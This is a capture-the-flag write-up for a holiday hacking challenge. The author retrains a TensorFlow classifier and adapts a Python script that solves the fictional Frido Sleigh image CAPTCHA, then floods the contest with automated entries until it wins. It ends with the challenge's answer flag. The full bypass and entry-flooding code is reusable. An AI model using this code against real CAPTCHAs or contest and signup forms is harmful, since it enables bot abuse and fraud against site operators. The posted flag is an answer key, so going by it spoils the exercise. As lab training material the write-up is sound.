Objective 8

Help Krampus beat the Frido Sleigh contest. For hints on achieving this objective, please talk with Alabaster Snowball in the Speaker Unpreparedness Room.

The initial task was to work through the demo that Chris Davis had made available at https://github.com/chrisjd20/img_rec_tf_ml_demo. Krampus also handed over a lot of useful material when talking to him in the Steam Tunnels, such as an API script and lots of presorted images to train the model on.

The first thing to do was to train the model. I removed the demo training images from img_rec_tf_ml_demo/training_images and extracted the CAPTEHA images into that directory.
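
As far as I can tell, retrain.py (like the stock TensorFlow retraining script it is based on) expects one subdirectory per label under training_images/, with the folder name becoming the label, which is exactly how Krampus's presorted images arrive. A quick sanity check before kicking off the training doesn't hurt; this little helper is my own, not part of the demo:

import os

# list each label folder under training_images/ and count the images inside it
root = "./training_images"
for label in sorted(os.listdir(root)):
    path = os.path.join(root, label)
    if os.path.isdir(path):
        print("{:20s} {} images".format(label, len(os.listdir(path))))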

I ran:

python3 retrain.py --image_dir ./training_images/

Once the training was complete, I grabbed some images from the Frido Sleigh website to test the model on, and it worked … phew.
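
One way to grab a test batch is straight from the CAPTEHA API; the endpoint and JSON keys are the same ones the final capteha_api.py uses further down. This standalone snippet is only a rough sketch (the test_images folder name is my own choice):

import base64
import json
import os
import requests

# request a CAPTEHA challenge and save each base64-encoded PNG under test_images/
resp = json.loads(requests.get("https://fridosleigh.com/api/capteha/request").text)
os.makedirs("test_images", exist_ok=True)
for image in resp['images']:
    filename = os.path.join("test_images", "{}.png".format(image['uuid']))
    with open(filename, "wb") as f:
        f.write(base64.b64decode(image['base64']))
print("Saved {} images".format(len(resp['images'])))

The saved images can then be dropped into the demo's unknown_images/ directory (if I remember the demo layout correctly) and classified with predict_images_using_trained_model.py to confirm the retrained model labels them sensibly.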

The next task was to modify capteha_api.py so that it would run against the website.

The file ended up as follows:

#!/usr/bin/env python3
# Fridosleigh.com CAPTEHA API - Made by Krampus Hollyfeld
import requests
import json
import sys

# imports from predict_images_using_trained_model.py
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
tf.logging.set_verbosity(tf.logging.ERROR)
import numpy as np
import threading
import queue
import time
import sys
import base64

# copied in functions from predict_images_using_trained_model.py
def load_labels(label_file):
    label = []
    proto_as_ascii_lines = tf.gfile.GFile(label_file).readlines()
    for l in proto_as_ascii_lines:
        label.append(l.rstrip())
    return label

def predict_image(q, sess, graph, image_bytes, img_uuid, labels, input_operation, output_operation):
    image = read_tensor_from_image_bytes(image_bytes)
    results = sess.run(output_operation.outputs[0], {
        input_operation.outputs[0]: image
    })
    results = np.squeeze(results)
    prediction = results.argsort()[-5:][::-1][0]
    q.put( {'prediction':labels[prediction].title(), 'percent':results[prediction], 'uuid':img_uuid})

def load_graph(model_file):
    graph = tf.Graph()
    graph_def = tf.GraphDef()
    with open(model_file, "rb") as f:
        graph_def.ParseFromString(f.read())
    with graph.as_default():
        tf.import_graph_def(graph_def)
    return graph

def read_tensor_from_image_bytes(imagebytes, input_height=299, input_width=299, input_mean=0, input_std=255):
    image_reader = tf.image.decode_png( imagebytes, channels=3, name="png_reader")
    float_caster = tf.cast(image_reader, tf.float32)
    dims_expander = tf.expand_dims(float_caster, 0)
    resized = tf.image.resize_bilinear(dims_expander, [input_height, input_width])
    normalized = tf.divide(tf.subtract(resized, [input_mean]), [input_std])
    sess = tf.compat.v1.Session()
    result = sess.run(normalized)
    return result


def main():
    yourREALemailAddress = "redacted@example.com"

    # Creating a session to handle cookies
    s = requests.Session()
    url = "https://fridosleigh.com/"

    json_resp = json.loads(s.get("{}api/capteha/request".format(url)).text)
    b64_images = json_resp['images']                    # A list of dictionaries each containing the keys 'base64' and 'uuid'
    challenge_image_type = json_resp['select_type'].split(',')     # The Image types the CAPTEHA Challenge is looking for.
    challenge_image_types = [challenge_image_type[0].strip(), challenge_image_type[1].strip(), challenge_image_type[2].replace(' and ','').strip()] # cleaning and formatting

    '''
    BEGIN IMAGE PROCESSING AND ML IMAGE PREDICTION CODE GOES HERE
    '''
    graph = load_graph('/tmp/retrain_tmp/output_graph.pb')
    labels = load_labels("/tmp/retrain_tmp/output_labels.txt")

    # Load up our session
    input_operation = graph.get_operation_by_name("import/Placeholder")
    output_operation = graph.get_operation_by_name("import/final_result")
    sess = tf.compat.v1.Session(graph=graph)

    # Use queues and threading to speed up the processing
    q = queue.Queue()

    for image in b64_images:

        # predict_image expects PNG image bytes, so decode the base64 string into a bytes object
        image_bytes = base64.b64decode(image['base64']) 
        threading.Thread(target=predict_image, args=(q, sess, graph, image_bytes, image['uuid'], labels, input_operation, output_operation)).start()


    print('Waiting For Threads to Finish...')
    while q.qsize() < len(b64_images):
        time.sleep(0.001)

    # collect all of the threads' returned results
    prediction_results = [q.get() for x in range(q.qsize())]

    # now build a list of the uuids for the matching images
    img_uuids=[]
    for prediction in prediction_results:
        # check whether the predicted label is one of the image types we are looking for
        if prediction['prediction'] in challenge_image_types:
            img_uuids.append(prediction['uuid'])

    # This should be JUST a comma-separated list of the image uuids the ML model predicted to match the challenge_image_types.
    final_answer = ','.join( img_uuids )
    print(final_answer)

    '''
    END IMAGE PROCESSING AND ML IMAGE PREDICTION CODE GOES HERE
    '''

    json_resp = json.loads(s.post("{}api/capteha/submit".format(url), data={'answer':final_answer}).text)
    if not json_resp['request']:
        # If it fails, just run it again; the ML might get one wrong occasionally
        print('FAILED MACHINE LEARNING GUESS')
        print('--------------------\nOur ML Guess:\n--------------------\n{}'.format(final_answer))
        print('--------------------\nServer Response:\n--------------------\n{}'.format(json_resp['data']))
        sys.exit(1)

    print('CAPTEHA Solved!')
    # If we get to here, we are successful and can submit a bunch of entries till we win
    userinfo = {
        'name':'Krampus Hollyfeld',
        'email':yourREALemailAddress,
        'age':180,
        'about':"Cause they're so flippin yummy!",
        'favorites':'thickmints'
    }
    # If we win the once-per-minute drawing, the response will tell us we were emailed.
    # It should take no more than 200 entries before we win. If more, something's wrong.
    entry_response = ''
    entry_count = 1
    while yourREALemailAddress not in entry_response and entry_count < 200:
        print('Submitting lots of entries until we win the contest! Entry #{}'.format(entry_count))
        entry_response = s.post("{}api/entry".format(url), data=userinfo).text
        entry_count += 1
    print(entry_response)


if __name__ == "__main__":
    main()

I then ran this code:

$ python3 ./capteha_api.py 
WARNING:tensorflow:From ./capteha_api.py:11: The name tf.logging.set_verbosity is deprecated. Please use tf.compat.v1.logging.set_verbosity instead.

WARNING:tensorflow:From ./capteha_api.py:11: The name tf.logging.ERROR is deprecated. Please use tf.compat.v1.logging.ERROR instead.

Waiting For Threads to Finish...
59cc6de0-e585-11e9-97c1-309c23aaf0ac,82af8dcc-e585-11e9-97c1-309c23aaf0ac,b4c65e13-e584-11e9-97c1-309c23aaf0ac,75ee4cd1-e585-11e9-97c1-309c23aaf0ac,38448ba0-e588-11e9-97c1-309c23aaf0ac,231d8ff4-e587-11e9-97c1-309c23aaf0ac,9461607a-e587-11e9-97c1-309c23aaf0ac,55badeec-e585-11e9-97c1-309c23aaf0ac,45ef9d2a-e588-11e9-97c1-309c23aaf0ac,f96c901a-e586-11e9-97c1-309c23aaf0ac,a0a92136-e586-11e9-97c1-309c23aaf0ac,eb38fcf9-e585-11e9-97c1-309c23aaf0ac,93f6773f-e586-11e9-97c1-309c23aaf0ac,7e592ac9-e586-11e9-97c1-309c23aaf0ac,57a42424-e586-11e9-97c1-309c23aaf0ac,411123dc-e586-11e9-97c1-309c23aaf0ac,3b0123b3-e586-11e9-97c1-309c23aaf0ac,0a51b749-e586-11e9-97c1-309c23aaf0ac,eb919b80-e585-11e9-97c1-309c23aaf0ac,099befb6-e586-11e9-97c1-309c23aaf0ac
CAPTEHA Solved!
Submitting lots of entries until we win the contest! Entry #1
Submitting lots of entries until we win the contest! Entry #2
Submitting lots of entries until we win the contest! Entry #3
[SNIP]
Submitting lots of entries until we win the contest! Entry #103
Submitting lots of entries until we win the contest! Entry #104
{"data":"<h2 id=\"result_header\"> Entries for email address redacted@example.com no longer accepted as our systems show your email was already randomly selected as a winner! Go check your email to get your winning code. Please allow up to 3-5 minutes for the email to arrive in your inbox or check your spam filter settings. <br><br> Congratulations and Happy Holidays!</h2>","request":true}

$

I then received an email with the winning code.

Congratulations

Answer

The Answer is “8Ia8LiZEwvyZr2WO”